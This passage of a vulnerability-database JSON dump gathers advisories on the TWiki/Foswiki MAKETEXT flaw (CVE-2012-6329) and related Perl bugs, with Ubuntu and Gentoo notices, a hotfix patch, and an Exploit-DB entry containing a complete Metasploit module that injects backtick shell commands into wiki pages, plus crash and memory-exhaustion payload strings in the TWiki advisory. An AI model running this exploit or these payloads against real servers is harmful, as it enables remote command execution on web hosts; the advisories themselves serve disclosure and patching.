cve-assign@mitre.org.\r\n * 2012-12-09 - TWiki notified of the Vulnerability.\r\n * 2012-12-10 - Developer fixes code &#40;George Clark&#41; and security team\r\nvalidates the fixes.\r\n * 2012-12-10 - Extensions.PatchItem12285Contrib released for Foswiki\r\n1.1.x\r\n * 2012-12-10 - Security team creates advisory with hotfix.\r\nAnnouncement delayed for coordination with TWiki &#40;George Clark&#41;\r\n * 2012-12-12 - Updated Debian packages released &#40;Sven Dowideit&#41;\r\n * 2012-12-12 - Send alert to foswiki-announce and foswiki-discuss\r\nmailing lists &#40; &#41;\r\n * 2012-12-14 - Publish advisory in Support web and update all related\r\ntopics &#40; &#41;\r\n * 2012-12-14 - Reference to public advisory on Download page and\r\nKnown Issues &#40; &#41;\r\n * 2012-xx-xx - Release Manager builds patch release &#40; &#41;\r\n * 2012-xx-xx - Issue a public security advisory &#40;vuln@secunia.com,\r\ncert@cert.org, bugs@securitytracker.com,\r\nfull-disclosure@lists.netsys.com, vulnwatch@vulnwatch.org&#41; &#40; &#41;\r\n", "edition": 1, "modified": "2012-12-18T00:00:00", "published": "2012-12-18T00:00:00", "id": "SECURITYVULNS:DOC:28873", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:28873", "title": "Foswiki Security Alert CVE-2012-6329, CVE-2012-6330 Remote code execution and other vulnerabilities in MAKETEXT macro", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:46", "bulletinFamily": "software", "cvelist": ["CVE-2011-3597", "CVE-2012-5195", "CVE-2011-2939", "CVE-2012-5526"], "description": "\r\n\r\n==========================================================================\r\nUbuntu Security Notice USN-1643-1\r\nNovember 30, 2012\r\n\r\nperl vulnerabilities\r\n==========================================================================\r\n\r\nA security issue affects these releases of Ubuntu and its derivatives:\r\n\r\n- Ubuntu 12.10\r\n- Ubuntu 12.04 LTS\r\n- Ubuntu 11.10\r\n- Ubuntu 10.04 LTS\r\n- Ubuntu 8.04 LTS\r\n\r\nSummary:\r\n\r\nPerl programs could be made to crash or run programs if they receive\r\nspecially crafted network traffic or other input.\r\n\r\nSoftware Description:\r\n- perl: Larry Wall&#39;s Practical Extraction and Report Language\r\n\r\nDetails:\r\n\r\nIt was discovered that the decode_xs function in the Encode module is\r\nvulnerable to a heap-based buffer overflow via a crafted Unicode string.\r\nAn attacker could use this overflow to cause a denial of service.\r\n&#40;CVE-2011-2939&#41;\r\n\r\nIt was discovered that the &#39;new&#39; constructor in the Digest module is\r\nvulnerable to an eval injection. An attacker could use this to execute\r\narbitrary code. &#40;CVE-2011-3597&#41;\r\n\r\nIt was discovered that Perl&#39;s &#39;x&#39; string repeat operator is vulnerable\r\nto a heap-based buffer overflow. An attacker could use this to execute\r\narbitrary code. &#40;CVE-2012-5195&#41;\r\n\r\nRyo Anazawa discovered that the CGI.pm module does not properly escape\r\nnewlines in Set-Cookie or P3P &#40;Platform for Privacy Preferences Project&#41;\r\nheaders. An attacker could use this to inject arbitrary headers into\r\nresponses from applications that use CGI.pm. &#40;CVE-2012-5526&#41;\r\n\r\nUpdate instructions:\r\n\r\nThe problem can be corrected by updating your system to the following\r\npackage versions:\r\n\r\nUbuntu 12.10:\r\n perl 5.14.2-13ubuntu0.1\r\n\r\nUbuntu 12.04 LTS:\r\n perl 5.14.2-6ubuntu2.2\r\n\r\nUbuntu 11.10:\r\n perl 5.12.4-4ubuntu0.1\r\n\r\nUbuntu 10.04 LTS:\r\n perl 5.10.1-8ubuntu2.2\r\n\r\nUbuntu 8.04 LTS:\r\n perl 5.8.8-12ubuntu0.7\r\n\r\nPerl programs need to be restarted after a standard system update to\r\nmake all the necessary changes.\r\n\r\nReferences:\r\n http://www.ubuntu.com/usn/usn-1643-1\r\n CVE-2011-2939, CVE-2011-3597, CVE-2012-5195, CVE-2012-5526\r\n\r\nPackage Information:\r\n https://launchpad.net/ubuntu/+source/perl/5.14.2-13ubuntu0.1\r\n https://launchpad.net/ubuntu/+source/perl/5.14.2-6ubuntu2.2\r\n https://launchpad.net/ubuntu/+source/perl/5.12.4-4ubuntu0.1\r\n https://launchpad.net/ubuntu/+source/perl/5.10.1-8ubuntu2.2\r\n https://launchpad.net/ubuntu/+source/perl/5.8.8-12ubuntu0.7\r\n\r\n\r\n\r\n-- ubuntu-security-announce mailing list ubuntu-security-announce@lists.ubuntu.com Modify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce\r\n", "edition": 1, "modified": "2012-12-02T00:00:00", "published": "2012-12-02T00:00:00", "id": "SECURITYVULNS:DOC:28787", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:28787", "title": "[USN-1643-1] Perl vulnerabilities", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:09:49", "bulletinFamily": "software", "cvelist": ["CVE-2011-3597", "CVE-2012-5195", "CVE-2011-2939", "CVE-2012-5526"], "description": "Buffer overflow in decode_xs, Digest constructor buffer veorflow, x operator buffer overflow, CGI.pm headers injection.", "edition": 1, "modified": "2012-12-02T00:00:00", "published": "2012-12-02T00:00:00", "id": "SECURITYVULNS:VULN:12731", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12731", "title": "perl multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:50", "bulletinFamily": "software", "cvelist": ["CVE-2012-6329"], "description": "\r\n\r\n==========================================================================\r\nUbuntu Security Notice USN-2099-1\r\nFebruary 05, 2014\r\n\r\nperl vulnerability\r\n==========================================================================\r\n\r\nA security issue affects these releases of Ubuntu and its derivatives:\r\n\r\n- Ubuntu 12.10\r\n- Ubuntu 12.04 LTS\r\n- Ubuntu 10.04 LTS\r\n\r\nSummary:\r\n\r\nPerl could be made to run programs if it processed a specially crafted\r\nLocale::Maketext templates.\r\n\r\nSoftware Description:\r\n- perl: Practical Extraction and Report Language\r\n\r\nDetails:\r\n\r\nIt was discovered that Perl&#39;s Locale::Maketext module incorrectly handled\r\nbackslashes and fully qualified method names. An attacker could possibly\r\nuse this flaw to execute arbitrary code when an application used untrusted\r\ntemplates.\r\n\r\nUpdate instructions:\r\n\r\nThe problem can be corrected by updating your system to the following\r\npackage versions:\r\n\r\nUbuntu 12.10:\r\n perl-modules 5.14.2-13ubuntu0.3\r\n\r\nUbuntu 12.04 LTS:\r\n perl-modules 5.14.2-6ubuntu2.4\r\n\r\nUbuntu 10.04 LTS:\r\n perl-modules 5.10.1-8ubuntu2.4\r\n\r\nIn general, a standard system update will make all the necessary changes.\r\n\r\nReferences:\r\n http://www.ubuntu.com/usn/usn-2099-1\r\n CVE-2012-6329\r\n\r\nPackage Information:\r\n https://launchpad.net/ubuntu/+source/perl/5.14.2-13ubuntu0.3\r\n https://launchpad.net/ubuntu/+source/perl/5.14.2-6ubuntu2.4\r\n https://launchpad.net/ubuntu/+source/perl/5.10.1-8ubuntu2.4\r\n\r\n\r\n\r\n\r\n-- ubuntu-security-announce mailing list ubuntu-security-announce@lists.ubuntu.com Modify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce\r\n", "edition": 1, "modified": "2014-02-10T00:00:00", "published": "2014-02-10T00:00:00", "id": "SECURITYVULNS:DOC:30295", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30295", "title": "[USN-2099-1] Perl vulnerability", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:09:54", "bulletinFamily": "software", "cvelist": ["CVE-2012-6329"], "description": "It&#39;s possible to call external functions on template compilation", "edition": 1, "modified": "2014-02-10T00:00:00", "published": "2014-02-10T00:00:00", "id": "SECURITYVULNS:VULN:13559", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13559", "title": "perl Locale::Maketext code execution", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "ubuntu": [{"lastseen": "2020-07-02T11:39:31", "bulletinFamily": "unix", "cvelist": ["CVE-2011-3597", "CVE-2012-5195", "CVE-2011-2939", "CVE-2012-5526"], "description": "It was discovered that the decode_xs function in the Encode module is \nvulnerable to a heap-based buffer overflow via a crafted Unicode string. \nAn attacker could use this overflow to cause a denial of service. \n(CVE-2011-2939)\n\nIt was discovered that the 'new' constructor in the Digest module is \nvulnerable to an eval injection. An attacker could use this to execute \narbitrary code. (CVE-2011-3597)\n\nIt was discovered that Perl's 'x' string repeat operator is vulnerable \nto a heap-based buffer overflow. An attacker could use this to execute \narbitrary code. (CVE-2012-5195)\n\nRyo Anazawa discovered that the CGI.pm module does not properly escape \nnewlines in Set-Cookie or P3P (Platform for Privacy Preferences Project) \nheaders. An attacker could use this to inject arbitrary headers into \nresponses from applications that use CGI.pm. (CVE-2012-5526)", "edition": 5, "modified": "2012-11-30T00:00:00", "published": "2012-11-30T00:00:00", "id": "USN-1643-1", "href": "https://ubuntu.com/security/notices/USN-1643-1", "title": "Perl vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-07-02T11:37:10", "bulletinFamily": "unix", "cvelist": ["CVE-2012-6329"], "description": "It was discovered that Perl's Locale::Maketext module incorrectly handled \nbackslashes and fully qualified method names. An attacker could possibly \nuse this flaw to execute arbitrary code when an application used untrusted \ntemplates.", "edition": 5, "modified": "2014-02-05T00:00:00", "published": "2014-02-05T00:00:00", "id": "USN-2099-1", "href": "https://ubuntu.com/security/notices/USN-2099-1", "title": "Perl vulnerability", "type": "ubuntu", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:51", "bulletinFamily": "unix", "cvelist": ["CVE-2012-5195", "CVE-2011-2939", "CVE-2013-1667", "CVE-2011-2728"], "description": "### Background\n\nPerl is Larry Wall\u2019s Practical Extraction and Report Language. Locale::Maketext is a Perl module - framework for localization. \n\n### Description\n\nMultiple vulnerabilities have been discovered in Perl and Locale::Maketext Perl module. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA context-dependent attacker could possibly execute arbitrary code with the privileges of the process or cause a Denial of Service condition. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Perl users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-lang/perl-5.16.3\"\n \n\nAll Locale::Maketext users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose\n \">=perl-core/locale-maketext-1.230.0\"", "edition": 1, "modified": "2014-01-19T00:00:00", "published": "2014-01-19T00:00:00", "id": "GLSA-201401-11", "href": "https://security.gentoo.org/glsa/201401-11", "type": "gentoo", "title": "Perl, Locale Maketext Perl module: Multiple vulnerabilities", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-06T19:46:43", "bulletinFamily": "unix", "cvelist": ["CVE-2012-6329"], "edition": 1, "description": "### Background\n\nLocale-Maketext - Perl framework for localization\n\n### Description\n\nTwo vulnerabilities have been reported in the Locale-Maketext module for Perl, which can be exploited by malicious users to compromise an application using the module. \n\nThe vulnerabilities are caused due to the \u201c_compile()\u201d function not properly sanitising input, which can be exploited to inject and execute arbitrary Perl code. \n\n### Impact\n\nA remote attacker could possibly execute arbitrary code with the privileges of the process, or cause a Denial of Service condition. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll users of the Locale-Maketext module should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose\n \">=perl-core/Locale-Maketext-1.230.0\"", "modified": "2014-12-29T00:00:00", "published": "2014-10-12T00:00:00", "id": "GLSA-201410-02", "href": "https://security.gentoo.org/glsa/201410-02", "type": "gentoo", "title": "Perl, Perl Locale-Maketext module: Multiple vulnerabilities", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-02-02T21:18:49", "description": "TWiki MAKETEXT Remote Command Execution. CVE-2012-6329. Remote exploit for unix platform", "published": "2012-12-23T00:00:00", "type": "exploitdb", "title": "TWiki MAKETEXT Remote Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-6329"], "modified": "2012-12-23T00:00:00", "id": "EDB-ID:23579", "href": "https://www.exploit-db.com/exploits/23579/", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# web site for more information on licensing and terms of use.\r\n# http://metasploit.com/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = ExcellentRanking\r\n\r\n\tinclude Msf::Exploit::Remote::HttpClient\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'TWiki MAKETEXT Remote Command Execution',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a vulnerability in the MAKETEXT Twiki variable. By using a\r\n\t\t\t\tspecially crafted MAKETEXT, a malicious user can execute shell commands since user\r\n\t\t\t\tinput is passed to the Perl \"eval\" command without first being sanitized. The\r\n\t\t\t\tproblem is caused by an underlying security issue in the CPAN:Locale::Maketext\r\n\t\t\t\tmodule. This works in TWiki sites that have user interface localization enabled\r\n\t\t\t\t(UserInterfaceInternationalisation variable set).\r\n\r\n\t\t\t\tIf USERNAME and PASSWORD aren't provided, anonymous access will be tried. Also,\r\n\t\t\t\tif the 'TwikiPage' option isn't provided, the module will try to create a random\r\n\t\t\t\tpage on the SandBox space. The modules has been tested successfully on\r\n\t\t\t\tTWiki 5.1.2 as distributed with the official TWiki-VM-5.1.2-1 virtual machine.\r\n\t\t\t},\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'George Clark', # original discovery\r\n\t\t\t\t\t'juan vazquez' # Metasploit module\r\n\t\t\t\t],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2012-6329' ],\r\n\t\t\t\t\t[ 'OSVDB', '88460' ],\r\n\t\t\t\t\t[ 'BID', '56950' ],\r\n\t\t\t\t\t[ 'URL', 'http://twiki.org/cgi-bin/view/Codev/SecurityAlert-CVE-2012-6329' ]\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => false, # web server context\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'DisableNops' => true,\r\n\t\t\t\t\t'Space' => 1024,\r\n\t\t\t\t\t'Compat' =>\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'PayloadType' => 'cmd',\r\n\t\t\t\t\t\t\t'RequiredCmd' => 'generic ruby python bash telnet'\r\n\t\t\t\t\t\t}\r\n\t\t\t\t},\r\n\t\t\t'Platform' => [ 'unix' ],\r\n\t\t\t'Arch' => ARCH_CMD,\r\n\t\t\t'Targets' => [[ 'Automatic', { }]],\r\n\t\t\t'DisclosureDate' => 'Dec 15 2012',\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOptString.new('TARGETURI', [ true, \"TWiki base path\", \"/\" ]),\r\n\t\t\t\tOptString.new('TwikiPage', [ false, \"TWiki Page with edit permissions to inject the payload, by default random Page on Sandbox (Ex: /Sandbox/MsfTest)\" ]),\r\n\t\t\t\tOptString.new('USERNAME', [ false, \"The user to authenticate as (anonymous if username not provided)\"]),\r\n\t\t\t\tOptString.new('PASSWORD', [ false, \"The password to authenticate with (anonymous if password not provided)\" ])\r\n\t\t\t], self.class)\r\n\tend\r\n\r\n\tdef do_login(username, password)\r\n\t\tres = send_request_cgi({\r\n\t\t\t'method' => 'POST',\r\n\t\t\t'uri' => \"#{@base}do/login\",\r\n\t\t\t'vars_post' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'username' => username,\r\n\t\t\t\t\t'password' => password\r\n\t\t\t\t}\r\n\t\t\t})\r\n\r\n\t\tif not res or res.code != 302 or res.headers['Set-Cookie'] !~ /TWIKISID=([0-9a-f]*)/\r\n\t\t\treturn nil\r\n\t\tend\r\n\r\n\t\tsession = $1\r\n\t\treturn session\r\n\tend\r\n\r\n\tdef inject_code(session, code)\r\n\r\n\t\tvprint_status(\"Retrieving the crypttoken...\")\r\n\r\n\t\tres = send_request_cgi({\r\n\t\t\t'uri' => \"#{@base}do/edit#{@page}\",\r\n\t\t\t'cookie' => \"TWIKISID=#{session}\",\r\n\t\t\t'vars_get' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'nowysiwyg' => '1'\r\n\t\t\t\t}\r\n\t\t})\r\n\r\n\t\tif not res or res.code != 200 or res.body !~ /name=\"crypttoken\" value=\"([0-9a-f]*)\"/\r\n\t\t\tvprint_error(\"Error retrieving the crypttoken\")\r\n\t\t\treturn nil\r\n\t\tend\r\n\r\n\t\tcrypttoken = $1\r\n\t\tvprint_good(\"crypttoken found: #{crypttoken}\")\r\n\r\n\t\tif session.empty?\r\n\t\t\tif res.headers['Set-Cookie'] =~ /TWIKISID=([0-9a-f]*)/\r\n\t\t\t\tsession = $1\r\n\t\t\telse\r\n\t\t\t\tvprint_error(\"Error using anonymous access\")\r\n\t\t\t\treturn nil\r\n\t\t\tend\r\n\t\tend\r\n\r\n\t\tvprint_status(\"Injecting the payload...\")\r\n\r\n\t\tres = send_request_cgi({\r\n\t\t\t'method' => 'POST',\r\n\t\t\t'uri' => \"#{@base}do/save#{@page}\",\r\n\t\t\t'cookie' => \"TWIKISID=#{session}\",\r\n\t\t\t'vars_post' =>\r\n\t\t\t{\r\n\t\t\t\t'crypttoken' => crypttoken,\r\n\t\t\t\t'text' => \"#{rand_text_alpha(3 + rand(3))} %MAKETEXT{\\\"#{rand_text_alpha(3 + rand(3))} [_1] #{rand_text_alpha(3 + rand(3))}\\\\\\\\'}; `#{code}`; { #\\\" args=\\\"#{rand_text_alpha(3 + rand(3))}\\\"}%\"\r\n\t\t\t}\r\n\t\t})\r\n\r\n\t\tif not res or res.code != 302 or res.headers['Location'] =~ /oops/ or res.headers['Location'] !~ /#{@page}/\r\n\t\t\tprint_warning(\"Error injecting the payload\")\r\n\t\t\tprint_status \"#{res.code}\\n#{res.body}\\n#{res.headers['Location']}\"\r\n\t\t\treturn nil\r\n\t\tend\r\n\r\n\t\tlocation = URI(res.headers['Location']).path\r\n\t\tprint_good(\"Payload injected on #{location}\")\r\n\r\n\t\treturn location\r\n\tend\r\n\r\n\tdef check\r\n\t\t@base = target_uri.path\r\n\t\t@base << '/' if @base[-1, 1] != '/'\r\n\r\n\t\tres = send_request_cgi({\r\n\t\t\t'uri' => \"#{@base}do/view/TWiki/WebHome\"\r\n\t\t})\r\n\r\n\t\tif not res or res.code != 200\r\n\t\t\treturn Exploit::CheckCode::Unknown\r\n\t\tend\r\n\r\n\t\tif res.body =~ /This site is running TWiki version.*TWiki-(\\d\\.\\d\\.\\d)/\r\n\t\t\tversion = $1\r\n\t\t\tprint_status(\"Version found: #{version}\")\r\n\t\t\tif version < \"5.1.3\"\r\n\t\t\t\treturn Exploit::CheckCode::Appears\r\n\t\t\telse\r\n\t\t\t\treturn Exploit::CheckCode::Safe\r\n\t\t\tend\r\n\t\tend\r\n\r\n\t\treturn Exploit::CheckCode::Detected\r\n\tend\r\n\r\n\r\n\tdef exploit\r\n\r\n\t\t# Init variables\r\n\t\t@page = ''\r\n\r\n\t\tif datastore['TwikiPage'] and not datastore['TwikiPage'].empty?\r\n\t\t\t@page << '/' if datastore['TwikiPage'][0] != '/'\r\n\t\t\t@page << datastore['TwikiPage']\r\n\t\telse\r\n\t\t\t@page << \"/Sandbox/#{rand_text_alpha_lower(3).capitalize}#{rand_text_alpha_lower(3).capitalize}\"\r\n\t\tend\r\n\r\n\t\t@base = target_uri.path\r\n\t\t@base << '/' if @base[-1, 1] != '/'\r\n\r\n\t\t# Login if needed\r\n\t\tif (datastore['USERNAME'] and\r\n\t\t\tnot datastore['USERNAME'].empty? and\r\n\t\t\tdatastore['PASSWORD'] and\r\n\t\t\tnot datastore['PASSWORD'].empty?)\r\n\t\t\tprint_status(\"Trying login to get session ID...\")\r\n\t\t\tsession = do_login(datastore['USERNAME'], datastore['PASSWORD'])\r\n\t\telse\r\n\t\t\tprint_status(\"Using anonymous access...\")\r\n\t\t\tsession = \"\"\r\n\t\tend\r\n\r\n\t\tif not session\r\n\t\t\tfail_with(Exploit::Failure::Unknown, \"Error getting a session ID\")\r\n\t\tend\r\n\r\n\t\t# Inject payload\r\n\t\tprint_status(\"Trying to inject the payload on #{@page}...\")\r\n\t\tres = inject_code(session, payload.encoded)\r\n\t\tif not res\r\n\t\t\tfail_with(Exploit::Failure::Unknown, \"Error injecting the payload\")\r\n\t\tend\r\n\r\n\t\t# Execute payload\r\n\t\tprint_status(\"Executing the payload through #{res}...\")\r\n\t\tres = send_request_cgi({\r\n\t\t\t'uri' => res,\r\n\t\t\t'cookie' => \"TWIKISID=#{session}\"\r\n\t\t})\r\n\t\tif not res or res.code != 200 or res.body !~ /HASH/\r\n\t\t\tfail_with(Exploit::Failure::Unknown, \"Error executing the payload\")\r\n\t\tend\r\n\r\n\t\tprint_good(\"Exploitation was successful\")\r\n\r\n\tend\r\n\r\nend\r\n\r\n=begin\r\n\r\n* Trigger:\r\n\r\n%MAKETEXT{\"test [_1] secondtest\\\\'}; `touch /tmp/msf.txt`; { #\" args=\"msf\"}%\r\n\r\n=end", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/23579/"}], "packetstorm": [{"lastseen": "2016-12-05T22:21:43", "description": "", "published": "2012-12-15T00:00:00", "type": "packetstorm", "title": "TWiki 5.1.2 Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-6329"], "modified": "2012-12-15T00:00:00", "id": "PACKETSTORM:118856", "href": "https://packetstormsecurity.com/files/118856/TWiki-5.1.2-Command-Execution.html", "sourceData": "`This security advisory alerts you of a potential security issue with \nTWiki installations: \nThe %MAKETEXT{}% TWiki variable allows arbitrary shell command \nexecution. The problem is caused by an underlying security issue in \nthe Locale::Maketext CPAN module. \n \n* Vulnerable Software Version \n* Attack Vectors \n* Impact \n* Severity Level \n* MITRE Name for this Vulnerability \n* Details \n* Countermeasures \n* Hotfix for TWiki Production Releases 5.1.x \n* Hotfix for older affected TWiki Releases \n* Authors and Credits \n* Action Plan with Timeline \n* External Links \n* Feedback \n \n---++ Vulnerable Software Version \n \n* TWiki-5.1.0 to TWiki-5.1.2 (TWikiRelease05x01x00 to \nTWikiRelease05x01x02) \n* TWiki-5.0.x (TWikiRelease05x00x00 to TWikiRelease05x00x02) \n* TWiki-4.3.x (TWikiRelease04x03x00 to TWikiRelease04x03x02) \n* TWiki-4.2.x (TWikiRelease04x02x00 to TWikiRelease04x02x04) \n* TWiki-4.1.x (TWikiRelease04x01x00 to TWikiRelease04x01x02) \n* TWiki-4.0.x (TWikiRelease04x00x00 to TWikiRelease04x00x05) \n \n---++ Attack Vectors \n \nEditing wiki pages and HTTP POST requests towards a TWiki server with \nenabled localization (typically port 80/TCP). Typically, prior \nauthentication is necessary. \n \n---++ Impact \n \nAn unauthenticated remote attacker can execute arbitrary shell \ncommands as the webserver user, such as user nobody. \n \n---++ Severity Level \n \nThe TWiki SecurityTeam triaged this issue as documented in \nTWikiSecurityAlertProcess [1] and assigned the following severity level: \n \n* Severity 1 issue: The web server can be compromised \n \n---++ MITRE Name for this Vulnerability \n \nThe Common Vulnerabilities and Exposures project has assigned the name \nCVE-2012-6329 [7] to this vulnerability. \n \n---++ Details \n \n1. Shell Command execution: The %MAKETEXT{}% TWiki variable is used to \nlocalize user interface content to a language of choice. Using a \nspecially crafted MAKETEXT, a malicious user can execute shell \ncommands by Perl backtick (``) operators. User input is passed to the \nPerl \"eval\" command without first being sanitized. The problem is \ncaused by an underlying security issue in the Locale::Maketext CPAN \nmodule. This works only in TWiki sites that have user interface \nlocalization enabled. \n \nIn addition, there are two less severe issues with MAKETEXT: \n \n2. Excessive memory allocation: %MAKETEXT{\"This is [_9999999999999999] \nEvil\"}% will consume all memory and swap space attempting to \ninitialize all missing entries in the parameters array. \n \n3. Crash: %MAKETEXT{\"This is [_0] problematic\"}% can cause a crash \nunder some circumstances. \n \n---++ Countermeasures \n \n* One of: \n* Disable localization by setting configure flag \n{UserInterfaceInternationalisation} to 0. \n* Apply hotfix (see patch below). \n* Upgrade to the latest patched production release TWiki-5.1.3 \n(TWikiRelease05x01x03) [2] when available. \n \n* In addition: \n* Install CPAN's Locale::Maketext version 1.23 or newer. \n* Use the {SafeEnvPath} configure setting to restrict the possible \ndirectories that are searched for executables. By default, this is \nthe PATH used by the webserver user. Set {SafeEnvPath} to a list of \nnon-writable directories, such as \"/bin:/usr/bin\". \n \n---++ Hotfix for TWiki Production Release 5.1.x \n \nAffected file: twiki/lib/TWiki.pm \n \nPatch to sanitize MAKETEXT parameters: \n \n=======( CUT 8><--- )=============================================== \n--- TWiki.pm (revision 24029) \n+++ TWiki.pm (working copy) \n@@ -4329,8 +4329,23 @@ \n \n# unescape parameters and calculate highest parameter number: \nmy $max = 0; \n- $str =~ s/~\\[(\\_(\\d+))~\\]/ $max = $2 if ($2 > $max); \"[$1]\"/ge; \n- $str =~ s/~\\[(\\*,\\_(\\d+),[^,]+(,([^,]+))?)~\\]/ $max = $2 if ($2 > \n$max); \"[$1]\"/ge; \n+ my $min = 1; \n+ $str =~ s/~\\[(\\_(\\d+))~\\]/ \n+ $max = $2 if ($2 > $max); \n+ $min = $2 if ($2 < $min); \n+ \"[$1]\"/ge; \n+ $str =~ s/~\\[(\\*,\\_(\\d+),[^,]+(,([^,]+))?)~\\]/ \n+ $max = $2 if ($2 > $max); \n+ $min = $2 if ($2 < $min); \n+ \"[$1]\"/ge; \n+ \n+ # Item7080: Sanitize MAKETEXT variable: \n+ return \"MAKETEXT error: No more than 32 parameters are allowed\" \nif( $max > 32 ); \n+ return \"MAKETEXT error: Parameter 0 is not allowed\" if( $min < 1 ); \n+ if( $TWiki::cfg{UserInterfaceInternationalisation} ) { \n+ eval { require Locale::Maketext; }; \n+ $str =~ s#\\\\#\\\\\\\\#g if( $@ || !$@ && \n$Locale::Maketext::VERSION < 1.23 ); \n+ } \n \n# get the args to be interpolated. \nmy $argsStr = $params->{args} || \"\"; \n=======( CUT 8><--- )=============================================== \n \nThis patch is also available separately [3] in case this gets mangled \nby the e-mail. \n \nOn a properly patched system, %MAKETEXT{\" [_99] \"}% should return this \nerror: \"MAKETEXT error: No more than 32 parameters are allowed\" \n \n---++ Hotfix for older affected TWiki Releases \n \nApply above patch (line numbers may vary). \n \n---++ Authors and Credits \n \n* Credit to TWiki:Main.GeorgeClark for disclosing the issue to the twiki-security@lists.sourceforge.net \nmailing list, and for providing a proposed fix. \n* TWiki:Main.PeterThoeny for creating the fix, patch and advisory. \n \n---++ Action Plan with Timeline \n \n* 2012-12-10: User discloses issue to TWikiSecurityMailingList [4], \nGeorge Clark, Foswiki \n* 2012-12-10: Developer verifies issue, Peter Thoeny \n* 2012-12-10: Developer fixes code, Peter Thoeny \n* 2012-12-10: Security team creates advisory with hotfix, Peter Thoeny \n* 2012-12-11: Developer verifies patch, Hideyo Imazu \n* 2012-12-12: Send alert to TWikiAnnounceMailingList [5] and \nTWikiDevMailingList [6], Peter Thoeny \n* 2012-12-14: Publish advisory in Codev web and update all related \ntopics, Peter Thoeny \n* 2012-12-14: Issue a public security advisory to full- \ndisclosure[at]lists.grok.org.uk, cert[at]cert.org, \nvuln[at]secunia.com, bugs[at]securitytracker.com, Peter Thoeny \n \n---++ External Links \n \n[1]: http://twiki.org/cgi-bin/view/Codev/TWikiSecurityAlertProcess \n[2]: http://twiki.org/cgi-bin/view/Codev/TWikiRelease05x01x03 \n[3]: http://twiki.org/cgi-bin/view/Codev/SecurityAlert-CVE-2012-6329 \n[4]: http://twiki.org/cgi-bin/view/Codev/TWikiSecurityMailingList \n[5]: http://twiki.org/cgi-bin/view/Codev/TWikiAnnounceMailingList \n[6]: http://twiki.org/cgi-bin/view/Codev/TWikiDevMailingList \n[7]: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-6329 - CVE \non MITRE.org \n \n---++ Feedback \n \nPlease provide feedback at the security alert topic, \nhttp://twiki.org/cgi-bin/view/Codev/SecurityAlert-CVE-2012-6329 \n \n-- Main.PeterThoeny - 2012-12-14 \n \n-- \n* Peter Thoeny - peter09[at]thoeny.org \n* http://TWiki.org - is your team already TWiki enabled? \n* Knowledge cannot be managed, it can be discovered and shared \n* This e-mail is: (_) private (x) ask first (_) public \n \n \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": 